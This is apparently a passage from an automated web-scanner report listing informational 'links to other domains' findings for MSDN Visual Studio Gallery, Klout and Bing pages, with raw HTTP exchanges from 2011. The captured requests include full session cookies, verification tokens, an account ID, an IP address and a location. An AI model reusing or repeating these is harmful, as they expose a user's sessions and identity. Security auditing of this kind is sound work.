Cookie: meld_sess=d96a784e-8901-47de-9dd1-4f91acb31514; __qca=P0-1342016851-1308225219551; D41U=3ldWxSUW5smmT8Cr1TVsp8odr2wpaUd4kIG9UWzIHns3qOaGxdAxaGw

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 3577
Content-Type: text/html
Date: Sat, 23 Jul 2011 13:48:43 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<script language="javascript" type="text/jav
...[SNIP]...
</script>
<img height="1" border="0" width="1" alt="" style="display: none;" src="http://va.px.invitemedia.com/admeld_imp?returnType=image&key=AdImp&cost=1.59&creativeID=130123&message=eJwVjTkOgDAMBL.CXBMp8R2ew5EqoqNC_B272hnJ3n2BCLaFRA3XBQhDDFXdwloIMHe5lK0MG164eS374LOcQoc1cu8HQr7msQlWS8sejZTIjkkcdD9zBmqOuJN8P445GnY-&managed=false"/>
<iframe src='http://pixel.invitemedia.com/data_sync?partner_id=134&exchange_id=6' width='1' height='1' frameborder='0' style='display: none;' scrolling='no' marginheight='0' marginwidth='0'></iframe>

<script type="text/javascript" src="http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>

<iframe width="0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match"></iframe>

<iframe width="0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://w55c.net/ct/cms-2-frame.html?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=260&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match"></iframe>
...[SNIP]...

18.124. http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula

Issue detail

The page was loaded from a URL containing a query string:

http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula?licenseType=None

The response contains the following links to other domains:

http://code.jquery.com/jquery-1.6.1.min.js
http://i1.services.social.s-msft.com/search/Widgets/SearchBox.jss?boxid=SearchTextBox&btnid=SearchButton&brand=Msdn&loc=en-US&resref=&addEnglish=&rn=&rq=&watermark=&focusOnInit=False&beta=0&iroot=vstudio&cver=0001
http://i1.social.s-msft.com/contentservice/271b0fc8-5324-44e5-b638-9dad00d725c4/Site.css
http://i1.social.s-msft.com/contentservice/81daafdb-6809-454b-a207-9f1900ec02ef/vstudio.css
http://i1.social.s-msft.com/contentservice/e99f2bf9-5c6e-4ac4-80de-9f2400ced346/Msdn.css
http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/Images/Msdn/networklogo_Msdn.png
http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/images/Msdn/favicon.ico
http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/scripts/common.min.js?cver=0001
http://i1.visualstudiogallery.msdn.s-msft.com/pageresource.css?groupname=visualstudiostyles&v=2011.7.19.3457
http://i1.visualstudiogallery.msdn.s-msft.com/pageresource.js?groupname=visualstudioscripts&v=2011.7.19.3457
http://msstonojssocial.112.2o7.net/b/ss/msstonojssocial/1/H.20.2--NS/0
http://www.omniture.com/
https://login.live.com/login.srf?wa=wsignin1.0&wtrealm=visualstudiogallery.msdn.microsoft.com&wreply=https%3a%2f%2fvisualstudiogallery.msdn.microsoft.com%2fsite%2f85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b%2feula%3flicenseType%3dNone%26stoAI%3d10&wp=MBI_FED_SSL&wlcxt=Msdn%24Msdn%24Msdn

Request

Response

18.125. http://visualstudiogallery.msdn.microsoft.com/site/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/site/search

Issue detail

The page was loaded from a URL containing a query string:

http://visualstudiogallery.msdn.microsoft.com/site/search?f%5B0%5D.Type=User&f%5B0%5D.Value=Mike%20Barnett&f%5B1%5D.Type=Tag&f%5B1%5D.Value=Design%20by%20Contract&f%5B1%5D.Text=Design%20by%20Contract

The response contains the following links to other domains:

http://code.jquery.com/jquery-1.6.1.min.js
http://i1.services.social.s-msft.com/search/Widgets/SearchBox.jss?boxid=SearchTextBox&btnid=SearchButton&brand=Msdn&loc=en-US&resref=&addEnglish=&rn=&rq=&watermark=&focusOnInit=False&beta=0&iroot=vstudio&cver=0001
http://i1.social.s-msft.com/contentservice/271b0fc8-5324-44e5-b638-9dad00d725c4/Site.css
http://i1.social.s-msft.com/contentservice/81daafdb-6809-454b-a207-9f1900ec02ef/vstudio.css
http://i1.social.s-msft.com/contentservice/e99f2bf9-5c6e-4ac4-80de-9f2400ced346/Msdn.css
http://i1.visualstudiogallery.msdn.s-msft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/image/file/35456/3/thumbnail.png
http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/Images/Msdn/networklogo_Msdn.png
http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/images/Msdn/favicon.ico
http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/scripts/common.min.js?cver=0001
http://i1.visualstudiogallery.msdn.s-msft.com/content/common/trans.gif
http://i1.visualstudiogallery.msdn.s-msft.com/pageresource.css?groupname=visualstudiostyles&v=2011.7.19.3457
http://i1.visualstudiogallery.msdn.s-msft.com/pageresource.js?groupname=visualstudioscripts&v=2011.7.19.3457
http://msstonojssocial.112.2o7.net/b/ss/msstonojssocial/1/H.20.2--NS/0
http://www.omniture.com/
https://login.live.com/login.srf?wa=wsignin1.0&wtrealm=visualstudiogallery.msdn.microsoft.com&wreply=https%3a%2f%2fvisualstudiogallery.msdn.microsoft.com%2fsite%2fsearch%3ff%255B0%255D.Type%3dUser%26f%255B0%255D.Value%3dMike%2520Barnett%26f%255B1%255D.Type%3dTag%26f%255B1%255D.Value%3dDesign%2520by%2520Contract%26f%255B1%255D.Text%3dDesign%2520by%2520Contract%26stoAI%3d10&wp=MBI_FED_SSL&wlcxt=Msdn%24Msdn%24Msdn

Request

GET /site/search?f%5B0%5D.Type=User&f%5B0%5D.Value=Mike%20Barnett&f%5B1%5D.Type=Tag&f%5B1%5D.Value=Design%20by%20Contract&f%5B1%5D.Text=Design%20by%20Contract HTTP/1.1
Host: visualstudiogallery.msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://visualstudiogallery.msdn.microsoft.com/site/search?f%5B0%5D.Type=User&f%5B0%5D.Value=Mike%20Barnett
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; WT_NVR=0=/:1=en-us:2=en-us/magazine; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; __RequestVerificationToken_Lw__=pjHQY8BdGI546GlXaRKN3E32bQyPjbHeACZ5mzigbLl9Q/Wgo6Sb4UGfNT47nDIqgqTJtPiw/S9u9F6ytYv8WnsfOJ3cf4Y0ceqNv6pDAd3bot9EW3xE9NPNKAshDbzMwut2oQ==; msdn=L=1033; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7afbaee-3910-41b0-9f73-42c5d519d743&Microsoft.CreationDate=07/23/2011 02:01:25&Microsoft.LastVisitDate=07/23/2011 02:03:41&Microsoft.NumberOfVisits=4&SessionCookie.Id=48B6F0A73328302A2806841DC13E324C; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/23/2011 02:03:41&Microsoft.VisitStartDate=07/23/2011 02:01:25&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=113&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=b6d6365d4e204cf6ab451e30a23dcb6b; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
P3P: CP="NON DSP COR ADM CUR DEV TAI OUR IND NAV PRE STA"
X-AspNet-Version: 4.0.30319
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 02:07:27 GMT; path=/
Server: GALS03
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 02:07:26 GMT
Content-Length: 32792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">

...[SNIP]...
<meta name="description" content="" />

<link rel="shortcut icon" href="http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/images/Msdn/favicon.ico" type="image/x-icon" />
<link href="http://i1.social.s-msft.com/contentservice/e99f2bf9-5c6e-4ac4-80de-9f2400ced346/Msdn.css" rel="Stylesheet" type="text/css" /><link href="http://i1.social.s-msft.com/contentservice/271b0fc8-5324-44e5-b638-9dad00d725c4/Site.css" rel="Stylesheet" type="text/css" /><link href="http://i1.social.s-msft.com/contentservice/81daafdb-6809-454b-a207-9f1900ec02ef/vstudio.css" rel="Stylesheet" type="text/css" /><meta name="CommunityInfo" content=" B=Msdn;A=Gallery::VisualStudio;L=en-US;" />
<script src="http://code.jquery.com/jquery-1.6.1.min.js" type="text/javascript" language="javascript"></script>
...[SNIP]...
<link rel="P3Pv1" href="/W3C/p3p.xml" />
<link href="http://i1.visualstudiogallery.msdn.s-msft.com/pageresource.css?groupname=visualstudiostyles&v=2011.7.19.3457" type="text/css" rel="Stylesheet" /><script src="http://i1.visualstudiogallery.msdn.s-msft.com/pageresource.js?groupname=visualstudioscripts&v=2011.7.19.3457" type="text/javascript">

</script>
...[SNIP]...
<div class="PassportScarab">
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&wtrealm=visualstudiogallery.msdn.microsoft.com&wreply=https%3a%2f%2fvisualstudiogallery.msdn.microsoft.com%2fsite%2fsearch%3ff%255B0%255D.Type%3dUser%26f%255B0%255D.Value%3dMike%2520Barnett%26f%255B1%255D.Type%3dTag%26f%255B1%255D.Value%3dDesign%2520by%2520Contract%26f%255B1%255D.Text%3dDesign%2520by%2520Contract%26stoAI%3d10&wp=MBI_FED_SSL&wlcxt=Msdn%24Msdn%24Msdn">Sign in</a>
...[SNIP]...
<a id="NetworkLink" href="http://Msdn.microsoft.com/en-US">
<img id="NetworkTaglineLogo" src="http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/Images/Msdn/networklogo_Msdn.png" />
</a>
...[SNIP]...
e/feeds/searchRss?f%5B0%5D.Type=User&f%5B0%5D.Value=Mike%20Barnett&f%5B1%5D.Type=Tag&f%5B1%5D.Value=Design%20by%20Contract&f%5B1%5D.Text=Design%20by%20Contract&sortBy=Popularity">
<img class="rss" src="http://i1.visualstudiogallery.msdn.s-msft.com/content/common/trans.gif" alt="rss" />
</a>
...[SNIP]...
<a href="/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b"><img class="thumbnail" alt="Code Contracts Editor Extensions" src="http://i1.visualstudiogallery.msdn.s-msft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/image/file/35456/3/thumbnail.png" /></a>
...[SNIP]...
<span class="Rating"><img style="vertical-align: text-top;" src="http://i1.visualstudiogallery.msdn.s-msft.com/content/common/trans.gif" class="FilledRatingStar" />
<img style="vertical-align: text-top;" src="http://i1.visualstudiogallery.msdn.s-msft.com/content/common/trans.gif" class="FilledRatingStar" />
<img style="vertical-align: text-top;" src="http://i1.visualstudiogallery.msdn.s-msft.com/content/common/trans.gif" class="FilledRatingStar" />
<img style="vertical-align: text-top;" src="http://i1.visualstudiogallery.msdn.s-msft.com/content/common/trans.gif" class="FilledRatingStar" />
<img style="vertical-align: text-top;" src="http://i1.visualstudiogallery.msdn.s-msft.com/content/common/trans.gif" class="HalfRatingStar" />
</span>
...[SNIP]...
</script>

<script src="http://i1.services.social.s-msft.com/search/Widgets/SearchBox.jss?boxid=SearchTextBox&btnid=SearchButton&brand=Msdn&loc=en-US&resref=&addEnglish=&rn=&rq=&watermark=&focusOnInit=False&beta=0&iroot=vstudio&cver=0001" type="text/javascript" language="javascript"></script>
<script src="http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/scripts/common.min.js?cver=0001" type="text/javascript" language="javascript"></script>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics">
<img src="http://msstonojssocial.112.2O7.net/b/ss/msstonojssocial/1/H.20.2--NS/0" height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...

18.126. http://visualstudiogallery.msdn.microsoft.com/site/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/site/search

Issue detail

The page was loaded from a URL containing a query string:

http://visualstudiogallery.msdn.microsoft.com/site/search?f%5B0%5D.Type=User&f%5B0%5D.Value=Mike%20Barnett

The response contains the following links to other domains:

http://code.jquery.com/jquery-1.6.1.min.js
http://i1.services.social.s-msft.com/search/Widgets/SearchBox.jss?boxid=SearchTextBox&btnid=SearchButton&brand=Msdn&loc=en-US&resref=&addEnglish=&rn=&rq=&watermark=&focusOnInit=False&beta=0&iroot=vstudio&cver=0001
http://i1.social.s-msft.com/contentservice/271b0fc8-5324-44e5-b638-9dad00d725c4/Site.css
http://i1.social.s-msft.com/contentservice/81daafdb-6809-454b-a207-9f1900ec02ef/vstudio.css
http://i1.social.s-msft.com/contentservice/e99f2bf9-5c6e-4ac4-80de-9f2400ced346/Msdn.css
http://i1.visualstudiogallery.msdn.s-msft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/image/file/35456/3/thumbnail.png
http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/Images/Msdn/networklogo_Msdn.png
http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/images/Msdn/favicon.ico
http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/scripts/common.min.js?cver=0001
http://i1.visualstudiogallery.msdn.s-msft.com/content/common/trans.gif
http://i1.visualstudiogallery.msdn.s-msft.com/pageresource.css?groupname=visualstudiostyles&v=2011.7.19.3457
http://i1.visualstudiogallery.msdn.s-msft.com/pageresource.js?groupname=visualstudioscripts&v=2011.7.19.3457
http://msstonojssocial.112.2o7.net/b/ss/msstonojssocial/1/H.20.2--NS/0
http://www.omniture.com/
https://login.live.com/login.srf?wa=wsignin1.0&wtrealm=visualstudiogallery.msdn.microsoft.com&wreply=https%3a%2f%2fvisualstudiogallery.msdn.microsoft.com%2fsite%2fsearch%3ff%255B0%255D.Type%3dUser%26f%255B0%255D.Value%3dMike%2520Barnett%26stoAI%3d10&wp=MBI_FED_SSL&wlcxt=Msdn%24Msdn%24Msdn

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
P3P: CP="NON DSP COR ADM CUR DEV TAI OUR IND NAV PRE STA"
X-AspNet-Version: 4.0.30319
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 02:03:25 GMT; path=/
Server: GALS03
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 02:03:25 GMT
Content-Length: 29296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">

...[SNIP]...
<meta name="description" content="" />

<link rel="shortcut icon" href="http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/images/Msdn/favicon.ico" type="image/x-icon" />
<link href="http://i1.social.s-msft.com/contentservice/e99f2bf9-5c6e-4ac4-80de-9f2400ced346/Msdn.css" rel="Stylesheet" type="text/css" /><link href="http://i1.social.s-msft.com/contentservice/271b0fc8-5324-44e5-b638-9dad00d725c4/Site.css" rel="Stylesheet" type="text/css" /><link href="http://i1.social.s-msft.com/contentservice/81daafdb-6809-454b-a207-9f1900ec02ef/vstudio.css" rel="Stylesheet" type="text/css" /><meta name="CommunityInfo" content=" B=Msdn;A=Gallery::VisualStudio;L=en-US;" />
<script src="http://code.jquery.com/jquery-1.6.1.min.js" type="text/javascript" language="javascript"></script>
...[SNIP]...
<link rel="P3Pv1" href="/W3C/p3p.xml" />
<link href="http://i1.visualstudiogallery.msdn.s-msft.com/pageresource.css?groupname=visualstudiostyles&v=2011.7.19.3457" type="text/css" rel="Stylesheet" /><script src="http://i1.visualstudiogallery.msdn.s-msft.com/pageresource.js?groupname=visualstudioscripts&v=2011.7.19.3457" type="text/javascript">

</script>
...[SNIP]...
<div class="PassportScarab">
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&wtrealm=visualstudiogallery.msdn.microsoft.com&wreply=https%3a%2f%2fvisualstudiogallery.msdn.microsoft.com%2fsite%2fsearch%3ff%255B0%255D.Type%3dUser%26f%255B0%255D.Value%3dMike%2520Barnett%26stoAI%3d10&wp=MBI_FED_SSL&wlcxt=Msdn%24Msdn%24Msdn">Sign in</a>
...[SNIP]...
<a id="NetworkLink" href="http://Msdn.microsoft.com/en-US">
<img id="NetworkTaglineLogo" src="http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/Images/Msdn/networklogo_Msdn.png" />
</a>
...[SNIP]...
<a href="/site/feeds/searchRss?f%5B0%5D.Type=User&f%5B0%5D.Value=Mike%20Barnett&sortBy=Popularity">
<img class="rss" src="http://i1.visualstudiogallery.msdn.s-msft.com/content/common/trans.gif" alt="rss" />
</a>
...[SNIP]...
<a href="/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b"><img class="thumbnail" alt="Code Contracts Editor Extensions" src="http://i1.visualstudiogallery.msdn.s-msft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/image/file/35456/3/thumbnail.png" /></a>
...[SNIP]...
<span class="Rating"><img style="vertical-align: text-top;" src="http://i1.visualstudiogallery.msdn.s-msft.com/content/common/trans.gif" class="FilledRatingStar" />
<img style="vertical-align: text-top;" src="http://i1.visualstudiogallery.msdn.s-msft.com/content/common/trans.gif" class="FilledRatingStar" />
<img style="vertical-align: text-top;" src="http://i1.visualstudiogallery.msdn.s-msft.com/content/common/trans.gif" class="FilledRatingStar" />
<img style="vertical-align: text-top;" src="http://i1.visualstudiogallery.msdn.s-msft.com/content/common/trans.gif" class="FilledRatingStar" />
<img style="vertical-align: text-top;" src="http://i1.visualstudiogallery.msdn.s-msft.com/content/common/trans.gif" class="HalfRatingStar" />
</span>
...[SNIP]...
</script>

<script src="http://i1.services.social.s-msft.com/search/Widgets/SearchBox.jss?boxid=SearchTextBox&btnid=SearchButton&brand=Msdn&loc=en-US&resref=&addEnglish=&rn=&rq=&watermark=&focusOnInit=False&beta=0&iroot=vstudio&cver=0001" type="text/javascript" language="javascript"></script>
<script src="http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/scripts/common.min.js?cver=0001" type="text/javascript" language="javascript"></script>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics">
<img src="http://msstonojssocial.112.2O7.net/b/ss/msstonojssocial/1/H.20.2--NS/0" height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...

18.127. http://widgets.klout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widgets.klout.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://widgets.klout.com/?from=ks

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js
http://codex.wordpress.org/Managing_Plugins
http://edge.quantserve.com/quant.js
http://pixel.quantserve.com/pixel/p-aeKjlJXBiuePA.gif

Request

GET /?from=ks HTTP/1.1
Host: widgets.klout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56134fc99bed15f2fd5a80818ad795283fd8c129697d9e64225945a634518a599f407fbb43ecf4a658b9ddf1a7db104c0d63b0746cfa03aaae1ab863abc117bdbb02d3db71de68697ce8ebe3b140cc694f4b6b9ac4bf3e11f81dffb4fbe1533cd73f68e028d22f98ab3055e53149c2adff152894de28de8dcf45425320dd945ad7c826560b357796ca6dc6d533ba78ba27924bdfc3a27ae4551253c31a845794d816ada889934d5f388625fc9e08a450fa5909e6636d6f9b6142468d27d5d3cc846223b4e70019c67a324da173d7e2040d7a91ae12b06d845ee0ecfc1a68b; __qca=P0-2053982506-1311432752930; __unam=c3eadea-131577bf952-48e618ce-1; __utma=261428178.226286795.1311432753.1311432753.1311432753.1; __utmb=261428178.5.10.1311432753; __utmc=261428178; __utmz=261428178.1311432753.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/home

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:53:01 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Vary: Accept-Encoding
Content-Length: 17909
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Bringing Influen
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js" type="text/javascript"></script>
...[SNIP]...
</a> and <a href="http://codex.wordpress.org/Managing_Plugins#Installing_Plugins">install it</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-aeKjlJXBiuePA.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

18.128. http://www.bing.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/search?q=msndn&form=MSSRPD

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://blogs.msdn.com/
http://channel9.msdn.com/
http://code.msdn.microsoft.com/
http://explorer.msn.com/install.htm
http://file.net/process/msndn.exe.html
http://g.msn.com/0TO_/enus
http://g.msn.com/AIPRIV/en-us
http://go.microsoft.com/?linkid=9771044
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://money.msn.com/
http://msdn.microsoft.com/en-us/aa570309
http://msdn.microsoft.com/en-us/bb188199
http://msdn.microsoft.com/en-us/default.aspx
http://msdn.microsoft.com/en-us/library/default.aspx
http://msdn.microsoft.com/en-us/magazine/default.aspx
http://msdn.microsoft.com/en-us/subscriptions/default.aspx
http://msdn.microsoft.com/en-us/vstudio/default.aspx
http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx
http://social.msdn.microsoft.com/Forums/en-US/categories
http://support.microsoft.com/kb/893357
http://www.acronymattic.com/MSNDN.html
http://www.dictionary.msn.com/
http://www.msn.com/
https://feedback.live.com/default.aspx?locale=en-US&productkey=wlsearchweb&P1=dsatweb&P2=msndn&P3=9013&P4=MSSRPD&P5=E361C23374E642C998D8ABA7166A75EC&P6=Washington, District Of Columbia&P9=38.906898498%2f-77.028396606&P10=0&P11=&searchtype=Web+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dmsndn%26FORM%3dFEEDTU

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Expires: Sat, 23 Jul 2011 02:07:25 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 23 Jul 2011 02:08:25 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=B8C6EB515AE04F898383683B7D3C2EF8; domain=.bing.com; path=/
Set-Cookie: MUID=E361C23374E642C998D8ABA7166A75EC; expires=Mon, 22-Jul-2013 02:08:25 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=E361C23374E642C998D8ABA7166A75EC%2c8b890481b4a848de957262672a125e92; expires=Mon, 22-Jul-2013 02:08:25 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1870688&SM=1&D=1769857&AF=BMMENO; expires=Mon, 22-Jul-2013 02:08:25 GMT; domain=.bing.com; path=/
Content-Length: 36662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<h3><a href="http://msdn.microsoft.com/en-us/default.aspx" onmousedown="return si_T('&ID=SERP,5096.1')">MSDN ... Explore Desktop, Web, Cloud, and Phone Software Development</a>
...[SNIP]...
<li><a href="http://msdn.microsoft.com/en-us/aa570309" onmousedown="return si_T('&ID=SERP,5054.1')">Downloads</a></li><li><a href="http://msdn.microsoft.com/en-us/subscriptions/default.aspx" onmousedown="return si_T('&ID=SERP,5056.1')">Msdn Subscriptions</a>
...[SNIP]...
<li><a href="http://social.msdn.microsoft.com/Forums/en-US/categories" onmousedown="return si_T('&ID=SERP,5058.1')">Forums</a></li><li><a href="http://msdn.microsoft.com/en-us/library/default.aspx" onmousedown="return si_T('&ID=SERP,5060.1')">Library</a>
...[SNIP]...
<li><a href="http://code.msdn.microsoft.com/" onmousedown="return si_T('&ID=SERP,5062.1')">Samples</a></li><li><a href="http://msdn.microsoft.com/en-us/magazine/default.aspx" onmousedown="return si_T('&ID=SERP,5064.1')">Msdn Magazine</a>
...[SNIP]...
<li><a href="http://msdn.microsoft.com/en-us/vstudio/default.aspx" onmousedown="return si_T('&ID=SERP,5066.1')">Visual Studio</a>
...[SNIP]...
<li><a href="http://msdn.microsoft.com/en-us/bb188199" onmousedown="return si_T('&ID=SERP,5068.1')">Learn</a>
...[SNIP]...
<h3><a href="http://msdn.microsoft.com/en-us/library/default.aspx" onmousedown="return si_T('&ID=SERP,5147.1')">MSDN Library</a>
...[SNIP]...
<h3><a href="http://blogs.msdn.com/" onmousedown="return si_T('&ID=SERP,5199.1')">MSDN Blogs</a>
...[SNIP]...
<h3><a href="http://file.net/process/msndn.exe.html" onmousedown="return si_T('&ID=SERP,5225.1')"><strong>
...[SNIP]...
